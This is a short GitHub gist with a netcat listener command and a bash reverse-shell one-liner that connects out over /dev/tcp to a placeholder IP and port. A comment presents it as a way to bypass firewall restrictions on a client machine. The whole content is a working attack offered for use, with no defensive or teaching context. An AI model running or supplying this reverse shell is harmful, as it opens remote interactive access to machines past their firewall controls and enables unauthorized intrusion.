Skip to content

Instantly share code, notes, and snippets.

@29942016
Created June 3, 2016 16:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 29942016/9d7f2e2b4e8984435fd42eb278e56cf5 to your computer and use it in GitHub Desktop.
Save 29942016/9d7f2e2b4e8984435fd42eb278e56cf5 to your computer and use it in GitHub Desktop.
#use to bypass regular firewall restrictions on client
#port forward on my router to allow incoming connection
nc -lvp <port>
bash -i >& /dev/tcp/<my ip>/<port> 0>&1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment